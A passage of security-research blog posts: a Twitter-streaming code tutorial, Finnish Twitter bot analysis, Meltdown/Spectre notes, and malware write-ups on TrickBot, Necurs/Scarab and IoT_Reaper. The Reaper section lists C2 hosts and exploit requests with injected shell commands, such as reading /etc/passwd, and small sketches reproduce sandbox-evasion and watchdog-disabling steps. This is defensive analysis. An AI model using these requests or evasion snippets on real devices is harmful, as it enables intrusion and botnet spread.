import threading
import sys
import time

The following two functions will run in our processing thread. One will process a Tweet object. In this case, we’ll do exactly the same as in our previous example, and simply print the Tweet’s text out.

# Processing thread
def process_tweet(status):
  if "text" in status:
    print status["text"]

The other function that will run in the context of the processing thread is a function to get items that were pushed into the queue. Here’s what it looks like.

def tweet_processing_thread():
  while True:
    item = tweet_queue.get()
    process_tweet(item)
    tweet_queue.task_done()

There are also two functions in our main thread. This one implements the same logic for attaching to a Twitter stream as in our first example. However, instead of calling process_tweet() directly, it pushes tweets onto the queue.

# Main thread
def get_tweet_stream(target_list, twarc):
  if len(target_list) > 0:
    query = ",".join(target_list)
    print "Search: " + query
    for tweet in twarc.filter(track = query):
      tweet_queue.put(tweet)
  else:
    print "Getting 1% sample."
    for tweet in twarc.sample():
      tweet_queue.put(tweet)

Now for our main function. We’ll start by creating a twarc object, and getting command-line args (as before):

if __name__ == '__main__':
  consumer_key=""
  consumer_secret=""
  access_token=""
  access_token_secret=""

  twarc = Twarc(consumer_key, consumer_secret, access_token, access_token_secret)

  target_list = []
  if (len(sys.argv) > 1):
    target_list = sys.argv[1:]

Next, let’s create the queue and start our processing thread.

  tweet_queue = Queue.Queue()
  thread = threading.Thread(target=tweet_processing_thread)
  thread.daemon = True
  thread.start()

Since listening to a Twitter stream is essentially an endless loop, let’s add the ability to catch ctrl-c and clean up if needed.

  while True:
    try:
      get_tweet_stream(target_list, twarc)
    except KeyboardInterrupt:
      print "Keyboard interrupt..."
      # Handle cleanup (save data, etc)
      sys.exit(0)
    except:
      print("Error. Restarting...")
      time.sleep(5)
      pass

If you want to observe a queue buildup, add a sleep into the process_tweet() function (see the sketch below), and attach to a stream with high enough volume (such as passing “trump” as a command-line parameter).
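Here’s roughly what that modification might look like (the one-second delay is arbitrary, and the qsize() call is only there to make the backlog visible):

# Slowed-down version of process_tweet() for observing queue buildup
def process_tweet(status):
  if "text" in status:
    time.sleep(1)  # artificial delay so tweets arrive faster than they are processed
    print status["text"]
    print "Queue backlog: " + str(tweet_queue.qsize())

Have fun listening to Twitter streams!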



Further Analysis Of The Finnish Themed Twitter Botnet

In a blog post I published yesterday, I detailed the methodology I have been using to discover “Finnish themed” Twitter accounts that are most likely being programmatically created. In my previous post, I called them “bots”, but for the sake of clarity, let’s refer to them as “suspicious accounts”.

These suspicious accounts all follow a subset of recommended profiles presented to new Twitter users. In many cases, these automatically created Twitter accounts follow exactly 21 users. The reason I pursued this line of research was because it was similar to a phenomenon I’d seen happening in the US earlier last year. Check this post for more details about that case.

In an attempt to estimate the number of accounts created by the automated process described in my previous post, I ran the same analysis tool against a list of 114 Twitter profiles recommended to new Finnish users. Here is the list.

juhasipila
TuomasEnbuske
alexstubb
hsfi
mikko
rikurantala
yleuutiset
jatkoaika
smliiga
Valavuori
SarasvuoJari
niinisto
iltasanomat
Tami2605
KauppalehtiFi
talouselama
TeemuSel8nne
nokia
HeikelaJussi
hjallisharkimo
Linnanahde
tapio_suominen
vrantanen
meteorologit
tikitalk10
yleurheilu
JaajoLinnonmaa
hirviniemi
pvesterbacka
taloussanomat
TuomasKyr
MTVUutiset
Haavisto
SuomenKuvalehti
MikaelJungner
paavoarhinmaki
KajKunnas
SamiHedberg
VilleNiinisto
HenkkaHypponen
SaskaSaarikoski
jhiitela
Finnair
TarjaHalonen
leijonat
JollaHQ
filsdeproust
makinenantti
lottabacklund
jyrkikasvi
JethroRostedt
Ulkoministerio
valtioneuvosto
Yleisradio
annaperho
liandersson
pekkasauri
neiltyson
villetolvanen
akiriihilahti
TampereenPoika
madventures
Vapaavuori
jkekalainen
AppelsinUlla
pakalupapito
rakelliekki
kyleturris
tanelitikka
SlushHQ
arcticstartup
lindaliukas
goodnewsfinland
docventures
jasondemers5
Retee27
H_Kovalainen
ipaananen
FrenzziiiBull
ylenews
digitoday
jraitamaa
marmai
MikaVayrynen
LKomarov
ovi8
paulavesala
OsmoSoininvaara
juuuso
JaanaPelkonen
saaraaalto
yletiede
TimoHaapala
Huuhkajat
ErvastiPekka
JussiPullinen
rsiilasmaa
moia
Palloliitto
teroterotero
ARaanta31
kirsipiha
JPohjanpalo
startupsauna
aaltoes
Villebla
MariaVeitola
merjaya
MikiKuusi
MTVSportfi
EHaula
svuorikoski
andrewickstroem
kokoomus

For each account, my script saved a list of accounts suspected of being automatically created. After completing the analysis of these 114 accounts, I iterated through all collected lists in order to identify all unique account names across those lists.
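The deduplication step itself is straightforward. Here’s a rough sketch, assuming each per-account result was saved as a JSON list of screen names into a results/ directory (the file layout shown here is illustrative):

import json
import os

unique_accounts = set()
for filename in os.listdir("results"):
  if filename.endswith(".json"):
    with open(os.path.join("results", filename)) as f:
      unique_accounts.update(json.load(f))
print("Unique accounts found: " + str(len(unique_accounts)))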

Across the 114 recommended Twitter profiles, my analysis identified 5631 unique accounts. Here are the (first twenty) age ranges of the most recently created accounts:

Age ranges of all suspicious Twitter accounts identified by my script

It has been suggested (link in Finnish) that these accounts appeared when a popular game, Growtopia, asked its players to follow their Twitter account after a game outage, and those new accounts started following recommended Twitter profiles (including those of Haavisto and Niinistö). In order to check if this was the case, I collected a list of accounts following @growtopiagame, and checked for accounts that appear on both that list, and the list of suspicious accounts collected in my previous step. That number was 3. This likely indicates that the accounts my analysis identified aren’t players of Growtopia.
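For reference, the overlap check itself boils down to a set intersection. A minimal sketch, assuming both lists of screen names were saved to JSON files (the file names are illustrative):

import json

with open("growtopia_followers.json") as f:
  growtopia_followers = set(json.load(f))
with open("suspicious_accounts.json") as f:
  suspicious_accounts = set(json.load(f))
overlap = growtopia_followers & suspicious_accounts
print("Accounts appearing in both lists: " + str(len(overlap)))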



Someone Is Building A Finnish-Themed Twitter Botnet

Finland will hold a presidential election on the 28th January 2018. Campaigning just started, and candidates are being regularly interviewed by the press and on the TV. In a recent interview, one of the presidential candidates, Pekka Haavisto, mentioned that both his Twitter account, and the account of the current Finnish president, Sauli Niinistö had recently been followed by a number of bot accounts. I couldn’t resist investigating this myself.

I wrote a tool to analyze a Twitter account’s followers. The Twitter API only gives me access to the last 5000 accounts that have followed a queried account. However, this was enough for me to find some interesting data.
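The follower data itself can be fetched with tweepy, much as in the earlier posts in this series. A minimal sketch, reusing the auth_api object and Cursor import shown in the tweepy post (the 5000-item cap reflects the API limitation mentioned above):

followers = []
for follower in Cursor(auth_api.followers, screen_name="Haavisto").items(5000):
  followers.append(follower)
print("Collected " + str(len(followers)) + " follower objects.")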

As I previously wrote, newly created bulk bot accounts often look very similar. I implemented some logic in my follower analysis tool that attempts to identify bots by looking for a combination of the following:

  • Is the account still an “egg” (default profile settings, default picture, etc.)?
  • Does the account follow exactly 21 other accounts?
  • Does the account follow very few accounts (less than 22)?
  • Does the account have a bot-like name (a string of random characters)?
  • Does the account have zero followers?
  • Has the account tweeted zero times?

Each of the above conditions gives a score. If the total of all scores exceeds an arbitrary threshold, I record the name of the account.
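In Python, the scoring logic looks roughly like the sketch below. The individual scores, the regular expression, and the threshold are illustrative rather than the exact values my tool uses, and the follower objects are assumed to come from a fetch like the one sketched above.

import re

def is_suspicious(user, threshold=3):
  score = 0
  if user.default_profile and user.default_profile_image:
    score += 1  # still an "egg" (default profile settings and picture)
  if user.friends_count == 21:
    score += 2  # follows exactly 21 accounts
  elif user.friends_count < 22:
    score += 1  # follows very few accounts
  if re.search(r"^[A-Za-z]+\d{6,}$", user.screen_name):
    score += 1  # bot-like screen name
  if user.followers_count == 0:
    score += 1  # no followers
  if user.statuses_count == 0:
    score += 1  # has never tweeted
  return score >= threshold

flagged_accounts = [u for u in followers if is_suspicious(u)]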

I ran this tool against the @Haavisto and @niinisto Twitter accounts and found the following:
Matches for @Haavisto account: 399
Matches for @niinisto account: 330

In both cases, the accounts in question were by and large under 2 months old.

Account age ranges for bots following @Haavisto

 

Account age ranges for bots following @niinisto
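For the record, here’s approximately how the age ranges shown in these charts can be derived from the collected user objects (the bucket size and variable names are illustrative):

from collections import Counter
from datetime import datetime

age_buckets = Counter()
for user in flagged_accounts:  # the user objects flagged by the scoring step above
  age_days = (datetime.utcnow() - user.created_at).days
  age_buckets[age_days // 7] += 1  # bucket account ages by week
for bucket, count in sorted(age_buckets.items()):
  print("Week " + str(bucket) + ": " + str(count) + " accounts")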

Interestingly, I checked the intersection between these two groups of bots. Only 49 of these accounts followed both @Haavisto and @niinisto.

Checking a handful of the flagged accounts manually using the Twitter web client, I quickly noticed that they all follow a similar selection of high-profile Finnish twitter accounts, including accounts such as:

Tuomas Enbuske (@TuomasEnbuske) – a Finnish celebrity
Riku Rantala (@rikurantala) – host of Madventures
Sauli Niinistö (@niinisto) – Finland’s current president
Juha Sipilä (@juhasipila) – Finland’s prime minister
Alexander Stubb (@alexstubb) – Former prime minister of Finland
Pekka Haavisto (@Haavisto) – presidential candidate
YLE (@yleuutiset) – Finland’s equivalent of the BBC
Kauppalehti (@KauppalehtiFi) – a popular Finnish newspaper
Ilta Sanomat (@iltasanomat) – a popular Finnish newspaper
Talous Sanomat (@taloussanomat) – a prominent financial news source
Helsingin Sanomat (@hsfi) – Helsinki’s local newspaper
Ilmatieteen laitos (@meteorologit) – Finnish weather reporting source

All the bots were following similar popular Finnish Twitter accounts, such as these.

Running the same analysis tool against Riku Rantala’s account yielded similar results. In fact, Riku has been the recipient of 660 new bot followers (although some of them were added on previous waves, judging by the account ages).

Account age ranges for bots following @rikurantala

I have no doubt that the other accounts listed above (and a few more) have recently been followed by several hundred of these bots.

By the way, running the same analysis against the @realDonaldTrump account found only 220 new bots. As a further check, I also ran the tool against @mikko, which yielded a count of 103 bots, and against @rsiilasmaa, which yielded only 38.

It seems someone is busy building a Finnish-themed Twitter botnet. We don’t yet know what it will be used for.



Some Notes On Meltdown And Spectre

The recently disclosed Meltdown and Spectre vulnerabilities can be viewed as privilege escalation attacks that allow an attacker to read data from memory locations that aren’t meant to be accessible. Neither of these vulnerabilities allow for code execution. However, exploits based on these vulnerabilities could allow an adversary to obtain sensitive information from memory (such as credentials, certificates, credit card information, etc.)

Exploits based on the Meltdown and Spectre vulnerabilities work by exploiting a feature of modern processors known as speculative execution (originally proposed by R. M. Tomasulo in 1967). Explained in simple terms, these exploits perform roughly the following four steps:

  • Flush or evict cache lines
  • Run code that causes the processor to perform speculative operations
  • Measure time to access certain cache locations known to contain secret data
  • Infer what that data was from measured access times

What is speculative execution?

Speculative execution is a technique used by high-speed processors in order to increase performance by guessing likely future execution paths and prematurely executing the instructions in them.

Although the results of these speculative execution paths are discarded if program control flow fails to reach them, they can leave behind observable effects in the system. The Meltdown and Spectre white papers primarily detail techniques whereby processor cache lines are examined in order to infer the results of speculative operations. However, the Spectre paper also suggests several other methods (not necessarily related to examining the cache) to do this, and concludes that “virtually any observable effect of speculatively executed code can be leveraged to leak sensitive information”. The primary techniques used to examine processor cache lines in the Meltdown and Spectre papers are Flush+Reload and Evict+Reload.

How do Flush+Reload and Evict+Reload work?

These techniques work by measuring the time it takes to perform a memory read at an address corresponding to an evicted or flushed cache line. If, after an operation, the monitored cache line was recently accessed, data will exist in the cache and access will be fast. If the cache line was not recently accessed, the read will be slow.

Here’s an example of cache line read times in a Flush+Reload attack. Note the downward spike indicating a faster read at one location. (Source: https://meltdownattack.com/meltdown.pdf)

What is the difference between Flush+Reload and Evict+Reload?

The main difference between these two techniques is the mechanism used for clearing the cache.

Flush+Reload uses a dedicated machine instruction, e.g., x86’s clflush, to evict the cache lines.

Evict+Reload forces contention on the cache set that stores the line, causing the processor to discard the contents of that cache line. Evict+Reload techniques are typically used when access to clflush is unavailable (e.g. from JavaScript).

Example code in the Spectre white paper (written in C) uses _mm_clflush() to perform a Flush+Reload attack (see Appendix A of the paper for details).

An example of JavaScript Evict+Reload can be found here. Note that this example is not the actual technique described in the Spectre white paper. The researchers note that the accuracy of performance.now() is intentionally degraded to dissuade timing attacks, so they implemented a higher-resolution timer by spawning separate threads that repeatedly decrement a value in a shared memory location.

Although Meltdown and Spectre utilize the same basic premise, there are a few differences in the details of how they work, and what they can be used for.

Spectre

A number of proof-of-concept exploits exist for Spectre.

One proof of concept uses the Linux kernel’s eBPF mechanism in order to execute a code construct in the context of the OS kernel, thus leading to a similar type of privilege escalation to that presented by Meltdown, but without using kernel exceptions.

Another Spectre proof of concept allows the host kernel memory space of a KVM (Linux Kernel Virtual Machine) to be exposed. This attack, however, needs admin access to the KVM guest image.

One of the most interesting applications of Spectre is a JavaScript-based proof of concept that can access memory from within the browser process it runs in. This exploit contains code that, when translated by a JIT, evaluates to a specific set of machine instructions. Execution of these JavaScript-based exploits happens within the context of the browser, and they cannot read memory from outside of the browser process. However, these examples can readily be turned into weaponized exploits designed to extract secrets from within a browser’s memory space (such as credentials, certificates, etc.).

Spectre proof of concepts have been shown to work on Intel, ARM, and AMD processors.

Meltdown

Meltdown exploits scenarios where some CPUs allow out-of-order execution of user instructions to read kernel memory. Meltdown uses exception handlers to achieve this.

  • Currently, Meltdown proof of concepts have only been successfully tested on Intel CPUs.
  • Meltdown requires the attacker to execute code on the victim’s system itself.
  • Meltdown can be used to defeat kernel address space layout randomization (KASLR).
  • Meltdown can also be used to read memory from adjacent virtualized containers (Docker, LXC, OpenVZ) on the same physical host that share the same kernel.
  • The Meltdown vulnerability is effectively shut down by the KAISER patch (see below).

Mitigations

Most operating systems have already received an update that includes the KAISER patch. This patch implements a stronger isolation between kernel and user space, thus breaking the techniques that allow the Meltdown vulnerability to be exploited to read kernel memory. With KAISER in place, it is still possible to break KASLR using Meltdown exploitation techniques. However, this technique becomes non-trivial.

Since some Spectre exploits are likely to target browsers, we expect browser vendors will patch against these attacks in the near future. These patches will likely disrupt scripts’ ability to accurately record timings, and thus break the Evict+Reload portion of the attack. Depending on when you read this, Firefox may have already been patched against some of these attack vectors.

Update: iOS 11.2.2 also patches Safari against Spectre.

KAISER performance concerns

The KAISER patch is known to affect system performance. Performance impacts will be higher on software that performs a lot of system calls. Actual performance impact numbers will depend on the software and environment in question. It is likely that certain server operating environments will be affected the most. Home machines will likely not see any significant impact.

Will the KAISER patch slow down cryptomining?

Mining, whether CPU- or GPU-based, shouldn’t be affected (there shouldn’t be any syscalls in mining loops). The network hashrate of Monero (a cryptocurrency commonly mined on CPUs) appears largely unchanged since the patch.

Detection of Meltdown and Spectre

Kernel memory violations are generated relatively infrequently by regular software. However, any process attempting to exploit Meltdown would generate thousands of such violations over a short duration. Capsule8 suggests that a system designed to monitor for an abundance of segmentation violations on kernel memory addresses (especially from the same PID) could be used to detect Meltdown exploits in action.

Endgame recommends monitoring for cache timing attacks using hardware performance counters. In their blog, they examine methods to detect signs of Meltdown exploitation using TSX counters, page flush counters, and by counting last-level-cache (LLC) micro operations. They also examine how it might be possible to detect Spectre attacks by recording speculative branch execution leaks.

Future

It is likely that software exploiting either Meltdown or Spectre will gather secrets as an intermediate step of a longer attack chain (e.g. reading credentials from memory and using them to elevate a process). Although patches against Meltdown have already been released for modern operating systems, there are plenty of legacy systems in the wild, and many users wait a long time to patch, or don’t bother patching at all. Just as old SMB vulnerabilities were leveraged by WannaCry in the not-too-distant past, we’d expect Meltdown to be fair game in the future.

In the near future, it is possible that new findings will arise around speculative execution implementations, especially on the Intel platform.



Don’t Let An Auto-Elevating Bot Spoil Your Christmas

Ho ho ho! Christmas is coming, and for many people it’s time to do some online shopping.
Authors of banking Trojans are well aware of this yearly phenomenon, so it shouldn’t come as a surprise that some of them have been hard at work preparing some nasty surprises for this shopping season.

And that’s exactly what TrickBot has just gone and done. TrickBot, currently one of the most prevalent banking trojans targeting Windows, has recently diversified into attacking Nordic banks. We’ve blogged about that a couple of times already.

As usual, the Trojan is being delivered via spam campaigns. According to this graph, based on our telemetry, most spam was distributed between Tuesday afternoon and Wednesday morning:

trickbot_spam_graph_20171213

The spam emails we’ve seen typically have a generic subject like “Your Payment – 1234”, a body with nothing but “Your Payment is attached”, and indeed an attachment which is a Microsoft Word document with instructions in somewhat poor English…

trickbot_spam_word_doc

Clicking the button will not reveal any document content, but will instead launch a macro that eventually downloads and runs the TrickBot payload.
Same old trick, but some people who have just bought a Christmas gift might still fall for it and end up with another ‘gift’ installed on their computer.

And that ‘gift’ is the most interesting part of this story. The newest payload underwent some changes which are, well, remarkable…

Targets

Since the malware’s initial appearance in fall 2016, the actors have been actively developing it, constantly expanding and changing its targets. Here is a short summary of the recently spotted changes:

  • Removed: banks in Australia, New Zealand, Argentina, Italy
  • Changed: a few Spanish, Austrian and Finnish targets are now found in the Dynamic Injection list (adding interception code to the actual web page) instead of using Static Injection (replacing the complete web page)
  • Added: new banks, particularly in France, Belgium and Greece.

Anti-sandbox checks

Until now, we were not aware of any features in TrickBot that check whether the malware is running in a virtual machine or in a sandboxed environment used for automated analysis. The new version introduces a few simple checks against some known sandboxes by calling GetModuleHandle for the following DLLs:

trickbot_antisandbox

(More info about every DLL can be found here)

If any of these modules are found, the payload just quits.
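The check itself boils down to something like the following Python/ctypes sketch. Note that the DLL names below are common examples of sandbox-related modules, not the exact list from the sample (that list is in the screenshot above).

import ctypes

# Example DLL names often associated with sandbox/analysis tooling; the actual
# list checked by this TrickBot version may differ.
SANDBOX_DLLS = ["sbiedll.dll", "dbghelp.dll", "pstorec.dll", "vmcheck.dll"]

def looks_sandboxed():
  kernel32 = ctypes.windll.kernel32  # Windows only
  for dll in SANDBOX_DLLS:
    # GetModuleHandleW returns a non-zero handle if the DLL is already loaded
    # into the current process; the payload quits if any of these are present.
    if kernel32.GetModuleHandleW(dll):
      return True
  return False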

Interestingly, we have also found a few encrypted strings that seem to indicate detection of the Windows virtual machine images that Microsoft provides for web developers to test their code in Internet Explorer and Edge; however, these strings are not used anywhere (yet). Let’s see whether the actors expand their sandbox evasion attempts in a future version.

trickbot_test_vm

Auto-elevation

But we have saved the best for last. When the payload was running, we noticed that it didn’t run with user rights, as it always did before. Instead, it was running under the SYSTEM account, i.e. with full system privileges. There was no UAC prompt during the infection sequence, so TrickBot must have used an auto-elevation mechanism to gain admin rights.

A little search in the disassembly quickly revealed an obvious clue:

trickbot_elevation_1

Combined with a few hard-coded CLSIDs …

trickbot_elevation_2

… we found out that the actors have implemented a UAC bypass which was (as far as we are aware) publicly disclosed only a few months ago. The original discovery is explained here:
https://msitpros.com/?p=3960
It was later implemented as a standalone piece of code, which was most likely the main inspiration for the TrickBot coders:
https://gist.github.com/hfiref0x/196af729106b780db1c73428b5a5d68d

In short: this bypass re-implements a COM interface that launches ShellExec with admin rights. That interface is used by a standard Windows component, the Connection Manager Administration Kit, to install network connections at the machine level.

It works everywhere from Windows 7 up to the latest Windows 10 version 1709 with default UAC settings, and considering it’s basically a Windows feature, it will probably be hard to address. In other words, it’s perfect for use in malware, and it wouldn’t surprise us to see the same bypass in more families soon.

Thanks to Päivi for the spam graph.

 



Necurs’ Business Is Booming In A New Partnership With Scarab Ransomware

Necurs’ spam botnet business is doing well, as it is seemingly acquiring new customers. The Necurs botnet is the biggest deliverer of spam, with 5 to 6 million infected hosts online monthly, and it is responsible for the biggest single malware spam campaigns. Its service model provides the whole infection chain: from spam emails with malicious downloader attachments, to hosting the payloads on compromised websites.

necurs_other

Necurs is contributing a fair bit to the malicious spam traffic we observe.

The Necurs botnet is most renowned for distributing the Dridex banking trojan, Locky ransomware, and “pump-and-dump” penny-stock spam. Since 2016 it has expanded its deliverables beyond these three, adding other ransomware families such as GlobeImposter and Jaff, as well as the banking trojan TrickBot, to its customer base, with Locky remaining its flagship deliverable with multiple malware spam campaigns per week.

This morning at 9AM (Helsinki time, UTC +2) we observed the start of a campaign with malicious .vbs script downloaders compressed with 7zip. The email subject lines are “Scanned from (Lexmark/HP/Canon/Epson)” and the attachment filename is formatted as “image2017-11-23-(7 random digits).7z“.
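For reference, a simple mail-filtering sketch that matches this particular lure could look like the following. The patterns are derived only from the subject and attachment naming described above; real campaign emails may vary beyond that.

import re

SUBJECT_RE = re.compile(r"^Scanned from (Lexmark|HP|Canon|Epson)")
ATTACHMENT_RE = re.compile(r"^image2017-11-23-\d{7}\.7z$")

def looks_like_campaign(subject, attachment_name):
  # Both the subject line and the attachment name must match the lure format.
  return bool(SUBJECT_RE.match(subject) and ATTACHMENT_RE.match(attachment_name))

print(looks_like_campaign("Scanned from HP", "image2017-11-23-1234567.7z"))  # True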

The final payload (to our surprise) was Scarab ransomware, which we haven’t seen previously delivered in massive spam campaigns. Scarab ransomware is a relatively new ransomware variant first observed last June, and its code is based on the open source “ransomware proof-of-concept” called HiddenTear.

This version doesn’t change the file names, but appends the extension “.[suupport@protonmail.com].scarab” to the encrypted files, and drops the following ransom note after encryption:

ransomnote
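As a practical aside, affected files are easy to enumerate by that appended extension alone; a quick sketch (the starting path below is just an example):

import os

SCARAB_EXT = ".[suupport@protonmail.com].scarab"

def find_encrypted(root):
  # Walk the tree and yield files carrying the appended Scarab extension.
  for dirpath, _, filenames in os.walk(root):
    for name in filenames:
      if name.endswith(SCARAB_EXT):
        yield os.path.join(dirpath, name)

for path in find_encrypted(r"C:\Users"):
  print(path)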

Necurs spam campaigns follow the same format from campaign to campaign: social engineering subject line themes ranging from financial matters to office utilities, very minimal message bodies, and usually a malicious attachment, sometimes just a URL. Because these simple social engineering themes are effective, Necurs tends to re-use them, sometimes within a rather short cycle. In this particular case, the subject lines used in this spam campaign were last seen in a Locky ransomware campaign exactly two weeks ago, the only difference being the extension of the attached downloader.

locky_scarab

This has already given Scarab ransomware a massive popularity bump, according to submissions to the ID Ransomware service.

We’re interested to see the future affiliations of this massive botnet, and to observe how it is able to change the trends and popularity of malware types and families. In the meantime, we’ll keep blocking these threats and keeping our customers safe.

IOCs:

b4a671ec80135bfb1c77f5ed61b8a3c80b2b6e51
7ac23eee5e15226867f5fbcf89f116bb01933227
d31beec9e2c7b312ecedb594f45a9f5174155c68
85dc3a0b833efb1da2efdcd62fab565c44f22718
da1e2542b418c85f4b57164e46e04e344db58ab8
a6f1f2dd63d3247adb66bd1ff479086207bd4d2b
14680c48eec4e1f161db1a4a990bd6833575fc8e
af5a64a9a01a9bd6577e8686f79dce45f492152e
c527bc757a64e64c89aaf0d9d02b6e97d9e7bb3d
3f51fb51cb1b9907a7438e2cef2e538acda6b9e9
b0af9ed37972aab714a28bc03fa86f4f90858ef5
6fe57cf326fc2434c93ccc0106b7b64ec0300dd7
http://xploramail.com/JHgd476?
http://miamirecyclecenters.com/JHgd476?
http://hard-grooves.com/JHgd476?
http://atlantarecyclingcenters.com/JHgd476?
http://pamplonarecados.com/JHgd476?
http://hellonwheelsthemovie.com/JHgd476?


RickRolled by none other than IoTReaper

IoT_Reaper overview

IoT_Reaper, or Reaper for short, is a Linux bot targeting embedded devices like webcams and home routers. Reaper is somewhat loosely based on the Mirai source code, but instead of trying a set of default admin credentials, Reaper tries to exploit device HTTP control interfaces.

It uses a range of vulnerabilities (a total of ten as of this writing) from the years 2013-2017. All of the vulnerabilities have been fixed by the vendors, but how well the actual devices are updated is another matter. According to some reports, we are talking about a ballpark figure of millions of infected devices.

In this blog post, we just wanted to add some minor details to the good reports already published by Netlab 360 [1], CheckPoint [2], Radware [3] and others.

Execution overview

When the Reaper enters a device, it takes some pretty drastic actions to disrupt the device’s monitoring capabilities. For example, it simply deletes the “/var/log” folder with “rm -rf”.
Another action is to disable the Linux watchdog daemon, if present, by sending a specific IOCTL to the watchdog device:

watchdog
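The standard way to do this through the Linux watchdog API looks roughly like the sketch below; the constants come from linux/watchdog.h (values as computed for x86/ARM), and whether the sample uses exactly this IOCTL is best confirmed from the screenshot above. Don’t run this on a machine with an active hardware watchdog, since mishandling /dev/watchdog can trigger a reboot.

import fcntl
import struct

WDIOC_SETOPTIONS = 0x80045704   # _IOR('W', 4, int) from linux/watchdog.h
WDIOS_DISABLECARD = 0x0001      # option flag: disable the watchdog

def disable_watchdog(device="/dev/watchdog"):
  # Opening the device arms the watchdog; the IOCTL below asks the driver
  # to disable it again.
  with open(device, "wb", buffering=0) as wd:
    fcntl.ioctl(wd, WDIOC_SETOPTIONS, struct.pack("i", WDIOS_DISABLECARD))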

After the initialization, the Reaper spawns a set of processes for different roles:

  • Poll the command and control servers for instructions
  • Start a simple status reporting server listening on port 23 (telnet)
  • Start an apparently unused service on port 48099
  • Start scanning for vulnerable devices

All the child processes run with a random name, such as “6rtr2aur1qtrb”.

String obfuscation

The Reaper’s spawned child processes use a trivial form of string obfuscation, which is surprisingly effective. The main process doesn’t use any obfuscation, but all child processes use this simple scheme when they start executing. Basically, it’s a single-byte XOR (0x22), but the way the data is arranged in memory makes it a bit challenging to connect the data to code.

The main process allocates a table on the heap and copies the XOR-encoded data into it. Later, when a child process wants to reference a particular encoded string, it decodes the string on the heap and refers to the decoded data by a numeric index. After use, the data is XORed back to its obfuscated form.

The following screenshot is a good presentation of the procedure:

decrypt
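Since the scheme is a plain single-byte XOR with 0x22, decoding (and re-encoding) a string is trivial; a minimal sketch:

XOR_KEY = 0x22

def xor_crypt(data):
  # XOR with a single byte is its own inverse: the same call both decodes
  # and re-encodes, which matches the decode-use-re-encode behavior above.
  return bytes(b ^ XOR_KEY for b in data)

encoded = xor_crypt(b"weruuoqweiur.com")   # obfuscate
print(xor_crypt(encoded))                  # b'weruuoqweiur.com'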

Command and Control

The Reaper periodically polls a fixed set of C2 servers:

weruuoqweiur.com, e.hl852.com, e.ha859.com and 27.102.101.121

The control messages and replies are transmitted over clear-text HTTP, and the beacons use the following format:

  /rx/hx.php?mac=%s%s&type=%s&port=%s&ver=%s&act=%d

The protocol is very simple; basically there are only two major functions, shutdown or execution of an arbitrary payload using the system shell.
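That beacon format is distinctive enough to hunt for in web proxy logs; a rough matcher is sketched below. Only the path and parameter names come from the observed format, and the example URL’s parameter values are made up for illustration.

import re

BEACON_RE = re.compile(
  r"/rx/hx\.php\?mac=[^&]*&type=[^&]*&port=[^&]*&ver=[^&]*&act=\d+")

def is_reaper_beacon(url):
  return bool(BEACON_RE.search(url))

print(is_reaper_beacon(
  "http://weruuoqweiur.com/rx/hx.php?mac=00aabbccddee&type=x&port=80&ver=1&act=0"))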

Port scanning

One of the child processes starts to scan for vulnerable victims. In addition to randomly generated IP addresses, Reaper uses nine hard-coded addresses for some unknown reason. Each address is scanned first with a set of apparently random-looking ports, and then with a set of somewhat more familiar ports:

80, 81, 82, 83, 84, 88, 1080, 3000, 3749, 8001, 8060, 8080, 8081, 8090, 8443, 8880, 10000

In fact, the random-looking ports are just a byte-swapped representation of the above port list. For example, 8880 = 0x22b0 turns into 0xb022 = 45090. The reason for this is still unknown.

It is possible that the author was just lazy and left out some endianness-handling code, or maybe it is some other error in the programming logic. Some IoT devices are big-endian, so the ports need to be byte-swapped before they can be used with socket code, as the sketch below illustrates.
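A small demonstration of that byte-swapping, using the port list above. On a little-endian host, socket.htons() produces exactly the same swapped values, which fits the missing-endianness-handling theory.

import socket

PORTS = [80, 81, 82, 83, 84, 88, 1080, 3000, 3749, 8001, 8060,
         8080, 8081, 8090, 8443, 8880, 10000]

def byte_swap16(port):
  # Swap the two bytes of a 16-bit value: 8880 = 0x22b0 -> 0xb022 = 45090.
  return ((port & 0xff) << 8) | (port >> 8)

for p in PORTS:
  print(p, byte_swap16(p), socket.htons(p))  # htons matches the swap on little-endian hosts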

Screenshot of the hard-coded list of ports:

ports

This is the list of hard-coded IP-addresses:

217.155.58.226
85.229.43.75
213.185.228.42
218.186.0.186
103.56.233.78
103.245.77.113
116.58.254.40
201.242.171.137
36.85.177.3

Exploitation

If the Reaper finds a promising victim, it next tries to send an HTTP-based exploit payload to the target. A total of ten different exploits have been observed so far, all related to the HTTP-based control interfaces of IoT devices. Here’s a list of the targeted vulnerabilities and the HTTP requests associated with them:

1 – Unauthenticated Remote Command Execution for D-Link DIR-600 and DIR-300

Exploit URI: POST /command.php HTTP/1.1

 

2 – CVE-2017-8225: exploitation of custom GoAhead HTTP server in several IP cameras

GET /system.ini?loginuse&loginpas HTTP/1.1

 

3 – Exploiting Netgear ReadyNAS Surveillance unauthenticated Remote Command Execution vulnerability

GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%%27echo+nuuo+123456;%%27 HTTP/1.1

 

4 – Exploitation of Vacron NVRs through Remote Command Execution

GET /board.cgi?cmd=cat%%20/etc/passwd HTTP/1.1

 

5 – Exploiting an unauthenticated RCE to list user accounts and their clear text passwords on D-Link 850L wireless routers

POST /hedwig.cgi HTTP/1.1

 

6 – Exploiting a Linksys E1500/E2500 vulnerability caused by missing input validation

POST /apply.cgi HTTP/1.1

 

7 – Exploitation of Netgear DGN DSL modems and routers using an unauthenticated Remote Command Execution

GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&curpath=/&currentsetting.htm=1cmd=echo+dgn+123456 HTTP/1.1

 

8 – Exploitation of AVTech IP cameras, DVRs and NVRs through an unauthenticated information leak and authentication bypass

GET /cgi-bin/user/Config.cgi?.cab&action=get&category=Account.* HTTP/1.1

 

9 – Exploiting DVRs running a custom web server with the distinctive HTTP Server header ‘JAWS/1.0’.

GET /shell?echo+jaws+123456;cat+/proc/cpuinfo HTTP/1.1

 

10 – Unauthenticated remote access to D-Link DIR-645 devices

POST /getcfg.php HTTP/1.1

 

Other details and The Roll

  • Reaper makes connectivity checks to Google’s DNS server 8.8.8.8. It won’t run without this connectivity.
  • There is no hard-coded payload functionality in this variant. The bot is supposedly receiving the actual functionality, like DDoS instructions, over the control channel.
  • The code contains an unused rickrolling link (yes, I was rickrolled)

Output from an IDAPython tool that dumps the encoded strings (the rickrolling link is the second one):

rickroll

Sample hash

The analysis in this post is based on a single version of the Reaper (md5: 37798a42df6335cb632f9d8c8430daec).

References

[1] http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/
[2] https://research.checkpoint.com/new-iot-botnet-storm-coming/
[3] https://blog.radware.com/security/2017/10/iot_reaper-botnet/



